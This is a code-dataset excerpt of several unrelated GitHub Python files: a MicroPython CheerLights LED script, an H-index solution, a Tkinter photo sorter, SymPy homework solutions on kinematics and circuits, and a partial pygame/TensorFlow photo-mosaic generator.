strip\n\n\n # define pins, create neopixel objects, and populate neopixels list:\n for i in range(len(pixel_pins)):\n pin = Pin(pixel_pins[i], Pin.OUT)\n neopixels.append(neopixel.NeoPixel(pin, num_pixels))\n\n\n # turn off any lit neopixels:\n neopixel_blank(neopixels)\n\n\n # seed the random generator\n adc = ADC(0)\n seed = adc.read()\n print(\"random seed: \", seed)\n urandom.seed(seed)\n\n\n # attempt to connect to wifi,\n # if connected, break from while loop:\n while True:\n # keep trying to connect to the internet:\n try:\n wifi.connect_wifi()\n break\n except Exception:\n print(\"Can not connect to wifi\")\n time.sleep(5)\n\n\n prev_color = ''\n previous_rgb = (0, 0, 0)\n recvd_color = ''\n target_rgb = (0, 0, 0)\n\n\n count = 0\n interval = 20 # seconds delay between updates\n last_update = time.time() - interval\n # last_update = -100 # time.time() + interval\n\n\n # main loop:\n while True:\n if time.time() > last_update + interval:\n recvd_color = api_request(api)\n last_update = time.time()\n\n # If cheerlights color feed has not changed, increment counter:\n if recvd_color == prev_color:\n count += 1\n\n # if color has changed, reset counter, re-assign prev_color,\n # extract rgb color from color lookup dict:\n else:\n count = 1\n prev_color = recvd_color\n target_rgb = new_neopixel_color(recvd_color, colors)\n\n print(str(count) + ': ' + recvd_color)\n\n previous_rgb = color_transition(neopixels, previous_rgb, target_rgb)\n\n\n# run the main function\nif __name__ == \"__main__\":\n main()\n","repo_name":"geokai/cheerlights_upython_NON-UPSTREAM","sub_path":"api_cheerlights.py","file_name":"api_cheerlights.py","file_ext":"py","file_size_in_byte":5905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3096261986","text":"def solution(citations):\n \n n = len(citations)\n b = sorted(citations,reverse=True)\n count = 0\n for i in range(n):\n tmp = b[i]\n count += 1\n if tmp < count:\n count = count - 1\n break\n return count","repo_name":"cksdud7007/CodingTest","sub_path":"프로그래머스/lv2/42747. H-Index/H-Index.py","file_name":"H-Index.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"7174799700","text":"from tkinter import *\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom tkinter import messagebox\nimport os\nfrom datetime import datetime\n\nroot = Tk()\n\nroot.title('PhotoSort')\nroot.geometry('500x150+500+300')\n\ns = ttk.Style()\ns.configure('my.TButton', font=(\"Helvetica\", 15))\n\n\ndef start():\n cur_path = entry_path.get() #обращаемся к функции , что бы взять путь\n if cur_path:\n for folder , subfolders , files in os.walk(cur_path): #Для каких файлов эта функция\n for file in files:\n path = os.path.join(folder,file) # Получаем путь к каждой фотке\n mtime = os.path.getmtime(path) # Узнаем сколько времени прошло с создания в секундах\n date = datetime.fromtimestamp(mtime) # Получаем дату в формате год . месяц . день + секунды\n date = date.strftime('%Y-%m') #Дата в формате год ю месяц ю день\n date_folder = os.path.join(cur_path , date) # получаем путь к файлу + дата создания\n\n if not os.path.exists(date_folder): # Ф-ия : если нет папки с датой фотографии - то мы её создаем\n os.mkdir(date_folder)# Создаем\n os.rename(path , os.path.join(date_folder,file)) # Перемещаем файл в созаную папку меняя путь методом Rename\n messagebox.showinfo('Success' , 'Сортировка завершена ')\n entry_path.delete(0,END)\n else:\n messagebox.showwarning('Error','Выберите папку с фотографиями')\n\n\n\n\n\n\ndef choose_dir():\n path = filedialog.askdirectory()\n entry_path.delete(0, END)\n entry_path.insert(0, path)\n\n\nm_frame = Frame(root, bg='#56ADFF', bd=5)\nm_frame.pack(pady=10, padx=10, fill=X)\nentry_path = ttk.Entry(m_frame)\nentry_path.pack(side=LEFT, expand=1, fill=X)\nBtn_choose = ttk.Button(m_frame, text='Выбрать папку', command=choose_dir).pack(fill=X, side=LEFT, padx=8)\n\nstart = ttk.Button(root, text=' Start', style=\"my.TButton\", command=start).pack(fill=X, padx=10)\n\nroot.mainloop()\n","repo_name":"DevSpaciX/PhotoSort-by-any-date-","sub_path":"PhotoSort.py","file_name":"PhotoSort.py","file_ext":"py","file_size_in_byte":2331,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"8020828909","text":"import sympy\nfrom math import degrees\n\nfrom sympy.physics.control.lti import TransferFunction\nfrom sympy.physics.control import control_plots as cplot\nimport matplotlib.pyplot as plt\n\n\ndef problem_1a():\n \"\"\"\n Problem 1 part a\n Prints the two solutions to the terminal\n \"\"\"\n t1, t2 = sympy.symbols(\"t1, t2\")\n fx = 4 * sympy.cos(t1) + 3 * sympy.cos(t2) - 6\n fy = 4 * sympy.sin(t1) + 3 * sympy.sin(t2) - 2\n # [{t1: ,t2: },{t1: , t2: }]\n answers = sympy.solve([fx, fy], (t1, t2), dict=True)\n print(\"raw:\")\n sympy.pprint(answers)\n print(\"Degrees:\\n(theta1, theta2)\")\n # loop through the answers list, convert to degrees, and account for t2 = theta1 + theta2\n for a in answers:\n print(\n (degrees(a[t1].evalf()), degrees(a[t2].evalf()) - degrees(a[t1].evalf()))\n )\n\n\ndef problem_1b():\n \"\"\"\n Create the plot for Problem 1 part b\n \"\"\"\n y, t1, t2 = sympy.symbols(\"y, t1, t2\", real=True)\n # given functions\n fx = 4 * sympy.cos(t1) + 3 * sympy.cos(t2) - 6\n fy = 4 * sympy.sin(t1) + 3 * sympy.sin(t2) - y\n\n # solve function x for t1 and t2\n ft1 = sympy.solve(fx, t1, dict=True)\n ft2 = sympy.solve(fx, t2, dict=True)\n\n # substitute functions for t1 and t2 into function y\n # so we can have t1 and t2 purely in terms of y\n f1 = fy.subs(ft1[0])\n a1 = sympy.solve(f1, t2)\n f2 = fy.subs(ft2[0])\n a2 = sympy.solve(f2, t1)\n\n # account for t2 = theta1 + theta2\n a2 = a2[0] - a1[0]\n\n # rad -> deg\n a1 = (a1[0] * 180) / sympy.pi\n a2 = (a2 * 180) / sympy.pi\n\n # plot\n plt_theta1 = sympy.plot(a1, (y, 0.1, 3.6), show=False)\n plt_theta1.ylabel = r\"$\\theta_1$ (degrees)\"\n plt_theta1.xlabel = r\"$\\it{y}$ (feet)\"\n plt_theta2 = sympy.plot(a2, (y, 0.1, 3.6), show=False)\n plt_theta2.ylabel = r\"$\\theta_2$ (degrees)\"\n plt_theta2.xlabel = r\"$\\it{y}$ (feet)\"\n sympy.plotting.PlotGrid(2, 1, plt_theta1, plt_theta2)\n\n\ndef problem_2b():\n \"\"\"\n Create the plot for Problem 2 part b\n \"\"\"\n r, s, c, l, w = sympy.symbols(\"r, s, c, l, w\", real=True)\n numer = (r * w) / l\n denom = sympy.sqrt((1 / (l * c) - w ** 2) ** 2 + (r * w / l) ** 2)\n h = numer / denom\n values = {\n c: 10e-6,\n l: 5e-3,\n }\n w_range = (w, 100, 100000) # 100 to 100k rad/s\n h = h.subs(values) # sub given C and L\n h_r10 = h.subs({r: 10})\n h_r100 = h.subs({r: 100})\n h_r1k = h.subs({r: 1000})\n\n # plot\n plt_r = sympy.plot(h_r10, w_range, show=False, legend=True, label=\"R=10\")\n plt_r100 = sympy.plot(h_r100, w_range, show=False, label=\"R=100\")\n plt_r1k = sympy.plot(h_r1k, w_range, show=False, label=\"R=1k\")\n plt_r.extend(plt_r100)\n plt_r.extend(plt_r1k)\n plt_r.title = r\"Transfer Function $\\it{H}$\"\n plt_r.xlabel = r\"$\\it{\\omega}$ (rad/s)\"\n plt_r.ylabel = r\"$\\it{H}(\\omega)$\"\n plt_r.show()\n\n\ndef problem_2cd():\n \"\"\"\n Create plots for Problem 2 parts c and d\n \"\"\"\n s = sympy.symbols(\"s\")\n r, c, l = sympy.symbols(\"r, c, l\", real=True)\n numer = r\n denom = r + (s * l) + (1 / (s * c))\n h = TransferFunction(numer, denom, s)\n values = {\n c: 10e-6,\n l: 5e-3,\n }\n h = h.subs(values)\n r_values = [10, 100, 1000]\n\n impulse_data = {}\n step_data = {}\n for i in r_values:\n f = h.subs({r: i})\n # part c\n cplot.bode_magnitude_plot(f, freq_unit=\"rad/sec\")\n\n # part d\n # use numerical_data functions to make plotting them together easier\n impulse_data[i] = cplot.impulse_response_numerical_data(f, upper_limit=0.005)\n step_data[i] = cplot.step_response_numerical_data(f, upper_limit=0.05)\n\n def plot_from_data(data: dict, plot_title: str):\n \"\"\"\n Plot data from dict of numerical_data (x, y) tuples\n :param data: dict of (x, y) tuples\n :param plot_title: title for the plot\n \"\"\"\n colors = {\n 10: 'b',\n 100: 'g',\n 1000: 'r'\n }\n for k, v in data.items():\n x, y = v\n plt.plot(x, y, color=colors[k], label=f\"R={k}\")\n plt.legend()\n plt.xlabel(\"Time (s)\")\n plt.ylabel(\"Amplitude\")\n plt.title(plot_title)\n plt.show()\n\n plot_from_data(impulse_data, \"Impulse Response\")\n plot_from_data(step_data, \"Step Response\")\n\n\ndef problem_2e():\n \"\"\"\n Print the natural response function for v_r\n \"\"\"\n t, r, l, c = sympy.symbols(\"t, r, l, c\", real=True)\n v_r, v_i = sympy.symbols(\"v_r, v_i\", cls=sympy.Function)\n deriv2_v_r = sympy.Derivative(v_r(t), t, 2)\n deriv_v_r = sympy.Derivative(v_r(t), t)\n f = deriv2_v_r + (r / l) * deriv_v_r + (v_r(t) / (l * c))\n ans = sympy.dsolve(f)\n sympy.pprint(ans)\n\n\nif __name__ == \"__main__\":\n sympy.init_printing(use_unicode=True)\n # change this function call to run a specific problem. We're not fancy here today.\n problem_2e()\n","repo_name":"sneakyaardvark/l6-sympy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32088073170","text":"import colorsys\nimport enum\nimport glob\nimport logging\nimport math\nimport multiprocessing\nimport os\nimport pickle\nimport queue\nimport random\nimport sys\nfrom multiprocessing import Process, Queue, Array, Lock\nfrom operator import itemgetter\nfrom time import time\n\nimport PIL.Image\nimport cv2\nimport numpy as np\nimport pygame\nimport tensorflow as tf\nimport tensorflow_hub as hub\nfrom PIL import ImageStat, ImageColor\nfrom pygame.locals import *\n\nimport label_map_util\n\nlogging.basicConfig(level=logging.DEBUG, format='%(process)d :: %(asctime)s :: %(levelname)s :: %(message)s')\na_logger = logging.getLogger()\noutput_file_handler = logging.FileHandler(\"output.log\")\nstdout_handler = logging.StreamHandler(sys.stdout)\na_logger.addHandler(output_file_handler)\na_logger.addHandler(stdout_handler)\n\n# define some parameter depending on whether we want to display it on 4k or 1800 display\nFOUR_K_MODE = False\n\nif FOUR_K_MODE:\n TILE_SIZE = 24 # or 30\n SCREEN_SIZE = (3840, 2160)\n LINE_WIDTH = 12\n FONT_SIZE = 40\n NUM_SAMPLES = 14400 # 32036 # total number of \"palette\" images from which we will choose from\n INPUT_TILES_DIR = \"./tiles/4k/\"\nelse:\n TILE_SIZE = 15\n SCREEN_SIZE = (1920, 1080)\n LINE_WIDTH = 6\n FONT_SIZE = 20\n NUM_SAMPLES = 9216 # total number of \"palette\" images from which we will choose from\n INPUT_TILES_DIR = \"./tiles/1800/\"\n\n# ENLARGEMENT = 8 # the mosaic image will be this many times wider and taller than the original TODO del\nTILE_MATCH_RES = 5 # tile matching resolution (higher values give better fit but require more processing)\nIMAGE_SIZE = (800, 450)\nTILE_BLOCK_SIZE = TILE_SIZE / max(min(TILE_MATCH_RES, TILE_SIZE), 1)\nWORKER_COUNT = max(multiprocessing.cpu_count() - 4, 1)\nEOQ_VALUE = None\nMAX_REUSE = 1 # max number of times a single image should be used in the mosaic\n\n# used for threshold condition in the swapping algorithm\nUNIT_TIME_SWAP_THRESHOLD = 10.0\n\nINPUT_IMAGES_DIR = \"./images/\"\nINPUT_INIT_IMAGES_DIR = \"./init_images/\"\nOUTPUT_DIR = \"./output/\"\n\nOUTPUT_FRAME_IMAGE_FILE_NAME = OUTPUT_DIR + \"mosaic_output\" + str(int(time() * 1000)) + \".jpg\"\nOUTPUT_SCREEN_IMAGE_FILE_NAME = OUTPUT_DIR + \"mosaic_screen_output\" + str(int(time() * 1000)) + \".jpg\"\nOUTPUT_VIDEO_FILE_NAME = OUTPUT_DIR + \"mosaic_output\" + str(int(time() * 1000)) + \".avi\"\n\n# frames per second rate for video\nFPS = 15\n# Save / record every nth frame (1 meaning every frame)\nFTS = 1\n\nPIL.Image.MAX_IMAGE_PIXELS = 933120000\n\n# support either downloading the models from the web, or from a local folder \"tfhub\"\n#MODEL_DIR_OPENIMAGES = \"tfhub/faster_rcnn_openimages_v4_inception_resnet_v2_1/\"\nMODEL_DIR_OPENIMAGES = \"https://tfhub.dev/google/faster_rcnn/openimages_v4/inception_resnet_v2/1\"\n#MODEL_DIR_COCO2017 = \"tfhub/efficientdet_d7_1/\"\nMODEL_DIR_COCO2017 = \"https://tfhub.dev/tensorflow/efficientdet/d7/1\"\n# required for mapping coco label ids to class names\nCOCO2017_LABELS = \"tfhub/mscoco_label_map.pbtxt\"\n\n# max detection boxes to display (model returns 100)\nMAX_BOXES = 25\n\n# permutation encoding\nACB = 1\nBAC = 2\nBCA = 3\nCAB = 4\nCBA = 5\n\n\n# calculate the perceived brightness of a given image\ndef get_brightness(im):\n stat = ImageStat.Stat(im)\n r, g, b = stat.mean\n return math.sqrt(0.241 * (r ** 2) + 0.691 * (g ** 2) + 0.068 * (b ** 2))\n\n\n# calculate the hue value of an image\ndef get_hue(im):\n img2 = im.resize((1, 1), PIL.Image.ANTIALIAS)\n color = img2.getpixel((0, 0))\n\n try:\n hls = colorsys.rgb_to_hls(color[0], color[1], color[2])\n except ZeroDivisionError as e:\n a_logger.warning(e)\n pass\n hls = colorsys.rgb_to_hls(color[0] + 1, color[1] + 2, color[2] + 3)\n return hls[0]\n\n\n# 3 ways to init the mosaic:\n# Random - random spread of all the tile images\n# Hue - organize the tiles by hue\n# Image - organize the tiles according to some image (has to be prepared beforehand -\n# export the image as a mosaic, to figure out tiles placement\nclass InitMode(enum.Enum):\n Random = 1\n Image = 2\n Hue = 3\n\n\n# 4 algorithms for switching tiles in runtime:\n# Random - iterate over all tiles at random order, replace tile with best fitting tile for that spot\n# Brightness - iterate over all tiles according to brightness (starting with least brightest),\n# replace tile with best fitting tile for that spot.\n# BrightnessReverse - iterate over all tiles according to brightness (starting with brightest),\n# replace tile with best fitting tile for that spot\n# Switch - choose two tiles in random, switch between them if improves (using dynamic improvement function)\nclass BuildMode(enum.Enum):\n Random = 1\n Brightness = 2\n BrightnessReverse = 3\n Switch = 4\n Ordered = 5\n\n\nclass Config:\n def __init__(self, create_video, save_images, init_order, building_order, image_file, init_image, tiles_file,\n wait_for_keypress, use_coco):\n self.create_video = create_video\n self.save_images = save_images\n self.init_order = init_order\n self.building_order = building_order\n self.init_image = init_image\n self.wait_for_keypress = wait_for_keypress\n self.image_file = image_file\n self.tiles_file = tiles_file\n self.use_coco = use_coco\n\n\nclass ProgressCounter:\n def __init__(self, total, text):\n self.total = total\n self.counter = 0\n self.text = text\n\n def update(self):\n self.counter += 1\n print(\"\\r{} Progress for {}: {:04.1f}%\".format(os.getpid(), self.text,\n 100 * self.counter / self.total), end=\"\")\n\n\n# input: x, y coordinates\n# output: returns a large bounding box (for actual tile placement) and a small bounding box (used for diff comparison)\ndef get_boxes(x, y):\n large_box = (x * TILE_SIZE, y * TILE_SIZE, (x + 1) * TILE_SIZE, (y + 1) * TILE_SIZE)\n small_box = (\n x * TILE_SIZE / TILE_BLOCK_SIZE, y * TILE_SIZE / TILE_BLOCK_SIZE,\n (x + 1) * TILE_SIZE / TILE_BLOCK_SIZE,\n (y + 1) * TILE_SIZE / TILE_BLOCK_SIZE)\n return large_box, small_box\n\n\n# input: a list of tile images output: a sorted list of these image tiles, sorted bu brightness values (with\n# parameter to define ascending / descending) brightness is defined as perceived brightness distance from grey\ndef get_brightness_data(original_img_small, x_tile_count, y_tile_count):\n by_brightness = []\n size = int(TILE_SIZE / TILE_BLOCK_SIZE)\n\n progress = ProgressCounter(x_tile_count * y_tile_count, \"Sorting image tiles by brightness\")\n for x in range(x_tile_count):\n for y in range(y_tile_count):\n large_box, small_box = get_boxes(x, y)\n\n img = PIL.Image.new('RGB', (size, size))\n img.putdata(original_img_small.crop(small_box).getdata())\n b = get_brightness(img)\n by_brightness.append((b, x * y_tile_count + y))\n progress.update()\n\n return by_brightness\n\n\nclass TileProcessor:\n def __init__(self, tiles_path):\n self.tiles_path = tiles_path\n\n @staticmethod\n def __process_tile(tile_path):\n try:\n img = PIL.Image.open(tile_path)\n # tiles must be square, so get the largest square that fits inside the image\n w = img.size[0]\n h = img.size[1]\n min_dimension = min(w, h)\n w_crop = (w - min_dimension) / 2\n h_crop = (h - min_dimension) / 2\n img = img.crop((w_crop, h_crop, w - w_crop, h - h_crop))\n\n large_tile_img = img.resize((TILE_SIZE, TILE_SIZE), PIL.Image.ANTIALIAS)\n small_tile_img = img.resize((int(TILE_SIZE / TILE_BLOCK_SIZE), int(TILE_SIZE / TILE_BLOCK_SIZE)),\n PIL.Image.ANTIALIAS)\n\n return large_tile_img.convert('RGB'), small_tile_img.convert('RGB')\n except Exception as e:\n a_logger.exception(e)\n return None, None\n\n def get_tiles(self):\n if os.path.isfile(self.tiles_path):\n tiles_file = open(self.tiles_path, 'rb')\n tiles_data = pickle.load(tiles_file)\n tiles_file.close()\n return tiles_data\n\n large_tiles = []\n small_tiles = []\n\n files = []\n ext = ('*.jpg', '*.jpeg')\n for e in ext:\n files.extend(glob.glob(os.path.join(self.tiles_path, e)))\n\n # Choose a random subset of the overall images\n # this helps to ensure we have a representative sample also\n # when we init by hue or brightness\n if len(files) > NUM_SAMPLES:\n files = random.sample(files, NUM_SAMPLES)\n\n progress = ProgressCounter(len(files), \"Reading tiles\")\n\n for tile_path in files:\n large_tile, small_tile = self.__process_tile(tile_path)\n\n if large_tile:\n large_tiles.append(large_tile)\n small_tiles.append(small_tile)\n progress.update()\n\n a_logger.debug('Processed {} tiles.'.format(len(large_tiles)))\n\n return large_tiles, small_tiles\n\n\nclass TargetImage:\n def __init__(self, image_path):\n self.image_path = image_path\n\n def get_data(self):\n a_logger.debug('Processing main image...')\n img = PIL.Image.open(self.image_path)\n img = img.resize(SCREEN_SIZE, PIL.Image.ANTIALIAS)\n\n # use SCREEN_SIZE as the target size for the mosaic\n w = SCREEN_SIZE[0] # img.size[0] * ENLARGEMENT\n h = SCREEN_SIZE[1] # img.size[1] * ENLARGEMENT\n large_img = img.resize((w, h), PIL.Image.ANTIALIAS)\n w_diff = (w % TILE_SIZE) / 2\n h_diff = (h % TILE_SIZE) / 2\n\n # if necessary, crop the image slightly so we use a whole number of tiles horizontally and vertically\n if w_diff or h_diff:\n large_img = large_img.crop((w_diff, h_diff, w - w_diff, h - h_diff))\n\n small_img = large_img.resize((int(w / TILE_BLOCK_SIZE), int(h / TILE_BLOCK_SIZE)), PIL.Image.ANTIALIAS)\n\n image_data = (large_img.convert('RGB'), small_img.convert('RGB'))\n\n a_logger.debug('Main image processed.')\n\n return image_data\n\n\nclass TileFitter:\n def __init__(self, tiles_data, diff_cache):\n self.tiles_data = tiles_data\n self.last_change = -1\n self.alpha = 0.3\n self.total_positive = 0\n self.total_negatives = 0\n self.start_time = time()\n self.local_diff_cache = diff_cache\n\n @staticmethod\n def __get_tile_diff(t1, t2, bail_out_value):\n\n diff = 0\n for i in range(len(t1)):\n diff += ((t1[i][0] - t2[i][0]) ** 2 + (t1[i][1] - t2[i][1]) ** 2 + (t1[i][2] - t2[i][2]) ** 2)\n if diff > bail_out_value:\n # we know already that this isn't going to be the best fit, so no point continuing with this tile\n return diff\n return diff\n\n def is_switch_good(self, img_data, coords, coords2id, lock):\n\n img1 = img_data[0]\n img2 = img_data[1]\n img3 = img_data[2]\n\n id1 = coords2id[coords[0]]\n id2 = coords2id[coords[1]]\n id3 = coords2id[coords[2]]\n\n tile_data1 = self.tiles_data[id1]\n tile_data2 = self.tiles_data[id2]\n tile_data3 = self.tiles_data[id3]\n\n # get the diff between the images and the tiles in the current state\n # use the cached value if possible\n\n # will be used to define the switch permutation between 3 tiles\n abc = -1\n\n # Switch condition: if at least 1 side improves by more than 1-alpha %, and the other one does\n # not get worse\n # we also keep track of how many successful swaps we did since last time reset\n # we use that as a proxy to headroom (we stop the program, when we go below a minimal threshold\n\n # BAC\n if img1 is None:\n new_diffB2A = sys.maxsize - 1\n new_diffC2A = sys.maxsize - 1\n curr_diff1 = sys.maxsize\n else:\n curr_diff1 = self.__get_tile_diff(img1, tile_data1,\n sys.maxsize) # self.get_current_diff( id1, img1, lock, tile_data1)\n new_diffB2A = self.__get_tile_diff(img1, tile_data2, curr_diff1)\n\n curr_diff2 = self.__get_tile_diff(img2, tile_data2, sys.maxsize)\n curr_diff3 = self.__get_tile_diff(img3, tile_data3, sys.maxsize)\n\n new_diffA2B = self.__get_tile_diff(img2, tile_data1, curr_diff2)\n\n if (new_diffB2A < self.alpha * curr_diff1 and new_diffA2B < curr_diff2) or (\n new_diffB2A < curr_diff1 and new_diffA2B < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, BAC\n\n # CBA\n if img1 is not None:\n new_diffC2A = self.__get_tile_diff(img1, tile_data3, curr_diff1)\n\n new_diffA2C = self.__get_tile_diff(img3, tile_data1, curr_diff3)\n\n if (new_diffC2A < self.alpha * curr_diff1 and new_diffA2C < curr_diff3) or (\n new_diffC2A < curr_diff1 and new_diffA2C < self.alpha * curr_diff3):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, CBA\n\n # ACB\n new_diffC2B = self.__get_tile_diff(img2, tile_data3, curr_diff2)\n new_diffB2C = self.__get_tile_diff(img3, tile_data2, curr_diff3)\n\n if (new_diffB2C < self.alpha * curr_diff3 and new_diffC2B < curr_diff2) or (\n new_diffB2C < curr_diff3 and new_diffC2B < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True, new_diffB2A, new_diffA2B, curr_diff3, ACB\n\n # CAB\n\n if new_diffC2A < self.alpha * curr_diff1 and new_diffA2B < curr_diff2 and new_diffB2C < curr_diff3 or \\\n new_diffC2A < curr_diff1 and new_diffA2B < self.alpha * curr_diff2 and new_diffB2C < curr_diff3 or \\\n new_diffC2A < curr_diff1 and new_diffA2B < curr_diff2 and new_diffB2C < self.alpha * curr_diff3:\n self.last_change = time()\n self.total_positive += 1\n abc = CAB\n\n return True, new_diffC2A, new_diffA2B, new_diffB2C, abc\n\n # BCA\n if new_diffB2A < self.alpha * curr_diff1 and new_diffC2B < curr_diff2 and new_diffA2C < curr_diff3 or \\\n new_diffB2A < curr_diff1 and new_diffC2B < self.alpha * curr_diff2 and new_diffA2C < curr_diff3 or \\\n new_diffB2A < curr_diff1 and new_diffC2B < curr_diff2 and new_diffA2C < self.alpha * curr_diff3:\n self.last_change = time()\n self.total_positive += 1\n abc = BCA\n\n return True, new_diffB2A, new_diffC2B, new_diffA2C, abc\n\n if time() - self.start_time >= UNIT_TIME_SWAP_THRESHOLD:\n a_logger.debug(\n \"Positives: {} Negatives: {} Time lapse: {}\".format(self.total_positive, self.total_negatives,\n time() - self.start_time))\n\n # heuristic for swapping threshold:\n if self.total_positive == 0 or (\n self.total_positive > 0 and self.total_negatives / self.total_positive > 1000): # todo\n self.alpha += 0.1\n a_logger.debug(\"updating alpha to {}\".format(self.alpha))\n if self.alpha >= 1.0:\n a_logger.debug(\"No more improvements!\")\n return EOQ_VALUE, EOQ_VALUE, EOQ_VALUE, EOQ_VALUE, EOQ_VALUE\n\n self.total_positive = 0\n self.total_negatives = 0\n self.start_time = time()\n\n self.total_negatives += 1\n return False, curr_diff1, curr_diff2, curr_diff3, abc\n\n def should_switch(self, id1, id2, lock, new_diff1, new_diff2, curr_diff1, curr_diff2): # diff_cache\n\n if (new_diff1 < self.alpha * curr_diff1 and new_diff2 < curr_diff2) or (\n new_diff1 < curr_diff1 and new_diff2 < self.alpha * curr_diff2):\n self.last_change = time()\n self.total_positive += 1\n return True\n return False\n\n def get_best_fit_tile(self, img_data, remaining_tiles, lock):\n best_fit_tile_index = -1\n min_diff = sys.maxsize\n candidates = []\n\n # go through each tile in turn looking for the best match for the part of the image represented by 'img_data'\n for key in remaining_tiles.keys():\n tile_data = self.tiles_data[key]\n diff = self.__get_tile_diff(img_data, tile_data, min_diff)\n if diff < min_diff:\n min_diff = diff\n candidates.append(key)\n\n lock.acquire()\n for best_fit_tile_index in reversed(candidates):\n times_used = remaining_tiles.get(best_fit_tile_index)\n if times_used is not None:\n remaining_tiles.pop(best_fit_tile_index)\n break\n lock.release()\n\n return best_fit_tile_index\n\n# switch between 3 tiles to get a better arrangement, switching 2 tiles can lead to local maxima\ndef switch_tiles(x_tile_count, y_tile_count, result_queue, coords2id, terminating_event,\n diff_cache, lock, cfg, mosaic_ready_event):\n _, original_img_small = TargetImage(cfg.image_file).get_data()\n _, tiles = TileProcessor(cfg.tiles_file).get_tiles()\n\n tiles_data = [list(tile.getdata()) for tile in tiles]\n\n # this function gets run by the worker processes, one on each CPU core\n image_cache = {}\n\n for x in range(x_tile_count):\n for y in range(y_tile_count):\n large_box, small_box = get_boxes(x, y)\n image_cache[x + y * x_tile_count] = list(original_img_small.crop(small_box).getdata())\n\n if not mosaic_ready_event.is_set():\n a_logger.debug(\"Waiting for Mosaic process\")\n mosaic_ready_event.wait()\n\n tile_fitter = TileFitter(tiles_data, diff_cache)\n\n num_tiles = len(tiles)\n num_tiles_in_image = x_tile_count * y_tile_count\n\n while not terminating_event.is_set():\n try:\n\n xy1 = int(num_tiles * random.random())\n x1 = int(xy1 / y_tile_count)\n y1 = xy1 % y_tile_count\n\n xy2 = int(num_tiles_in_image * random.random())\n x2 = int(xy2 / y_tile_count)\n y2 = xy2 % y_tile_count\n\n xy3 = int(num_tiles_in_image * random.random())\n x3 = int(xy3 / y_tile_count)\n y3 = xy3 % y_tile_count\n\n img_coords = (xy1, x2 + y2 * x_tile_count, x3 + y3 * x_tile_count)\n\n if xy1 > x_tile_count * y_tile_count - 1:\n imgdata1 = None\n else:\n imgdata1 = image_cache.get(img_coords[0])\n\n img_data = (imgdata1, image_cache.get(img_coords[1]), image_cache.get(img_coords[2]))\n\n is_switch_good, diff1, diff2, diff3, abc = tile_fitter.is_switch_good(img_data, img_coords, coords2id, lock)\n\n if is_switch_good == EOQ_VALUE:\n a_logger.debug(\"Ending switch_tiles\")\n break\n\n if is_switch_good:\n\n lock.acquire()\n id1 = coords2id[img_coords[0]]\n id2 = coords2id[img_coords[1]]\n id3 = coords2id[img_coords[2]]\n\n #abc defines the switch permutation\n if abc == BAC:\n coords2id[img_coords[0]] = id2\n coords2id[img_coords[1]] = id1\n\n elif abc == BCA:\n coords2id[img_coords[0]] = id2\n coords2id[img_coords[1]] = id3\n coords2id[img_coords[2]] = id1\n\n elif abc == CBA:\n coords2id[img_coords[0]] = id3\n coords2id[img_coords[2]] = id1\n\n elif abc == CAB:\n coords2id[img_coords[0]] = id3\n coords2id[img_coords[1]] = id1\n coords2id[img_coords[2]] = id2\n\n elif abc == ACB:\n coords2id[img_coords[1]] = id3\n coords2id[img_coords[2]] = id2\n\n lock.release()\n\n result_queue.put((img_coords, (id1, id2, id3), abc), block=False, timeout=0.1)\n\n except queue.Full:\n a_logger.warning(\"Switch tiles: Queue is full !\")\n continue\n except KeyboardInterrupt:\n pass\n break\n\n # let the result handler know that this worker has finished everything\n result_queue.put((EOQ_VALUE, EOQ_VALUE, EOQ_VALUE))\n\n\ndef fit_tiles(sorted_coords, y_tile_count, result_queue, remaining_tiles, diff_cache, lock, cfg, mosaic_ready_event):\n _, original_img_small = TargetImage(cfg.image_file).get_data()\n _, tiles = TileProcessor(cfg.tiles_file).get_tiles()\n\n tiles_data = [list(tile.getdata()) for tile in tiles]\n\n # this function gets run by the worker processes, one on each CPU core\n tile_fitter = TileFitter(tiles_data, diff_cache)\n\n if not mosaic_ready_event.is_set():\n a_logger.debug(\"Waiting for Mosaic process\")\n mosaic_ready_event.wait()\n\n progress = ProgressCounter(len(sorted_coords), \"Fitting tiles to mosaic\")\n\n for coord in sorted_coords:\n try:\n y = coord % y_tile_count\n x = int(coord / y_tile_count)\n\n large_box, small_box = get_boxes(x, y)\n img_data = list(original_img_small.crop(small_box).getdata())\n img_coords = large_box\n\n tile_index = tile_fitter.get_best_fit_tile(img_data, remaining_tiles, lock)\n result_queue.put((img_coords, tile_index))\n progress.update()\n except queue.Full:\n a_logger.warning(\"Queue full while putting - shouldn't happen!\")\n continue\n except KeyboardInterrupt:\n pass\n break\n # let the result handler know that this worker has finished everything\n result_queue.put((EOQ_VALUE, EOQ_VALUE))\n\n\nclass MosaicImage:\n def __init__(self, size, tiles_file, init_mode, init_image, use_coco, coords2id, request_q):\n\n tiles, _ = TileProcessor(tiles_file).get_tiles()\n pygame.init()\n self.coords2id = coords2id\n self.window_name = \"Rosy AI\"\n self.frame_counter = 0\n self.pseudo_frame_counter = 0\n self.last_frame_time = 0\n self.requestQ = request_q\n self.fpsClock = pygame.time.Clock()\n self.font = pygame.font.SysFont('robotoregular', FONT_SIZE)\n self.colors = list(ImageColor.colormap.values())\n self.colors.remove('#000000')\n self.screen = pygame.display.set_mode(size, pygame.FULLSCREEN)\n pygame.display.set_caption(self.window_name)\n self.blits = []\n\n self.x_tile_count = int(size[0] / TILE_SIZE)\n self.y_tile_count = int(size[1] / TILE_SIZE)\n self.total_tiles_in_image = self.x_tile_count * self.y_tile_count\n surface_tiles = [pygame.surfarray.make_surface(np.array(tile).reshape((TILE_SIZE, TILE_SIZE, 3))).convert() for\n tile in\n tiles]\n self.category_index = label_map_util.create_category_index_from_labelmap(COCO2017_LABELS,\n use_display_name=True) # TODO 